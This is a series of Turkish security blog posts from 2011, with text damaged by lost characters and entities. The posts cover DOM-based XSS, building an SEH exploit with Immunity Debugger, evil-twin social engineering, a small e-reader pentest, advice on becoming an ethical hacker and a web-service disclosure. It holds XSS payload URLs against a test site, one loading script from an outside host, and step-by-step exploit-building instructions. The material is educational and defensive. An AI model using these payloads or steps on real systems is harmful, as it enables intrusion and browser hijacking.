bull DOM tabanlı İstemci tarafında bulunan kodun (javascript) DOMa (Document Object ModelBelge Nesne Yapısıdır) muumldahaleetmesiyle ortaya ccedilıkmaktadır DOM tabanlı XSSin en guumlzel yanı istemci tarafında olduğu iccedilin sunucuya herhangi bir paketgoumlnderilmemektedir bu nedenle sunucu tarafında tespit edilmesi veya engellenmesi muumlmkuumln olmaz

XSS zafiyetinin sadece kutucuk ccedilıkartarak ccedilerez (cookie) ccedilalarak veya olta (phishing) saldırılarında kullanarak istismar edilmeyeceğinedair en guumlzel oumlrneği Apachenin geccedilen sene başına gelenlerden oumlğrenebilirsiniz 2010 yılında art niyetli kişiler tarafından Apachesunucularında bulunan bir web uygulamasında keşfedilen XSS zafiyetinin istismar edilmesi ile başlayan sızma girişimi sunuculardaroot yetkisine sahip olmaları ile son buldu Farkındalığı arttırma adına mutlaka okunması ve okutturulması gereken bu olaya ait detaylıbilgiye buradan ulaşabilirsiniz

XSS zafiyeti ile ilgili bir oumlrnek uumlzerinden geccedilmezsek anlaşılması guumlccedil olacağı iccedilin ufak bir oumlrnek uumlzerinden hızlıca ilerleyelim

Aşağıda yer alan bağlantı adresini ziyaret edecek olursanız karşınıza tfSearch parametresine girdi olarak belirtilen Mert kelimesininaratılması sonucunda sunucu tarafından doumlnen yanıtı goumlreceksiniz Uygulama tarafında tfSearch parametresinde girdi kontroluuml (koumltuumlkarakter filtrelemesi) yapılmadığı iccedilin XSS zafiyetine yol accedilmaktadır

XSS zafiyeti istismar edilmeden kullanım (tfSearch parametresinde XSS zafiteyi bulunmaktadır)

httptestaspvulnwebcomSearchasptfSearch=Mert

XSS zafiyetini istismar ederek kullanım 1 (alarm kutucuğu)

httptestaspvulnwebcomSearchasptfSearch=ltscriptgtalert(XSS)ltscriptgt

XSS zafiyetini istismar ederek kullanım 2 (başka bir siteden zararlı javascript kodu ccedilağırma)

httptestaspvulnwebcomSearchasptfSearch=ltscript SRC=httphackersorgxssjsgtltscriptgt

Unutmayın XSS zafiyetini istismar ederek zararlı bir siteden zararlı javascript kodu ccedilağırmanızı sağlayan art niyetli kişiler internettarayıcınızı uzaktan youmlneterek tuumlm tuş kayıtlarınızı izleyebilir ziyaret ettiğiniz siteleri tespit edebilir Metasploit ile internet tarayıcınızınzafiyetlerini istismar ederek sisteminize sızabilir veya adsl modeminizin youmlnetim sayfasındaki CSRF zafiyetini istismar ederek youmlneticişifrenizi değiştirerek modeminizi kontrol edebilir

Tuş kayıtlarının Beef aracı ile nasıl izlenebildiğini goumlsteren videoyu şiddetle izlemenizi tavsiye ederim

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin beşincisi burada son bulurken herkese guumlvenli guumlnler dilerim

5 Dakikada SEH İstismar Aracı (Exploit) HazırlamaSource httpswwwmertsaricacomtestBy MS on July 19th 2011

Yazılarımı takip edenleriniz daha oumlnce SEH İstismarını konu olan bir yazı yazdığımı hatırlayacaktır Buguumlnkuuml yazımda SEH istismararacının Immunity Debugger uumlzerinde ccedilalışan pvefindaddrpy eklentisi ile nasıl kısa bir suumlre iccedilinde hazırlanabileceğini goumlreceğiz

Immunity Debugger istismar aracı (exploit) hazırlamak zararlı yazılım (malware) analizi ve tersine muumlhendislik yapmak isteyenlericcedilin oldukccedila başarılı bir hata ayıklama (debugger) aracıdır Sade ve anlaşılır arayuumlzuuml komut satırı desteği ve Python ile betik (script)hazırlamaya imkan tanıyan desteği sayesinde masauumlstuumlmuumln vazgeccedililmezleri arasında yer almaktadır

pvefindaddrpy eklentisi Peter Van Eeckhoutte tarafından istismar aracı hazırlamak iccedilin oumlzel olarak tasarlanmış ve iccedilinde paternoluşturmaktan otomatik istismar kodu şablonu oluşturmaya kadar bir ccedilok oumlzelliğe sahiptir Eklentinin kullanımı ile ilgili detaylı bilgiyeburadan ulaşabilirsiniz

Adımlara geccedilmeden oumlnce ilk olarak sisteminizde yuumlkluuml olan Immunity Debugger aracı iccedilin pvefindaddrpy aracını buradan indirerek CProgram FilesImmunity IncImmunity DebuggerPyCommands klasoumlruuml altına kopyalayın

İstismar edilecek araccedil olarak daha oumlnceki yazımda adı geccedilen Free WMA MP3 Converter v11 aracını kullanacağız

Immunity Debugger aracını ccedilalıştırdıktan sonra File -gt Open menuumlsuumlnden CProgram FilesFree WMA MP3 ConverterWmpconexearacını seccedilelim ve Open butonuna basalım F9 tuşuna basarak programı ccedilalıştıralım Komut satırında pvefindaddr pattern_create5000 yazarak 5000 bayt buumlyuumlkluumlğuumlnde bir patern oluşturalım Oluşturulan patern CProgram FilesImmunity IncImmunity Debuggermspatterntxt dosyası olarak kayıt edilmektedir

19

Dosyanın iccedilindeki paterni taslak halde olan istismar aracımıza (exppy) kopyaladıktan sonra ccedilalıştırarak WMA MP3 Converterprogramında yer alan hatayızafiyeti tetikleyecek WAV uzantılı dosyayı (MSwav) oluşturalım

WMA MP3 Converter programında yer alan WAV to MP3 butonuna basarak MSwav dosyasını seccedilelim ve Immunity Debugger aracıuumlzerinde Access Violation hatası ile karşılaştıktan sonra komut satırında pvefindaddr suggest yazarak eklenti tarafından bize oumlnerilenistismar aracı oluşturma şablonunu goumlruumlntuumlleyelim (Oumlnerilen kod Perl diline youmlnelik olduğu iccedilin bu kodu Python koduna ccedilevirmemizgerekecektir)

20

Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

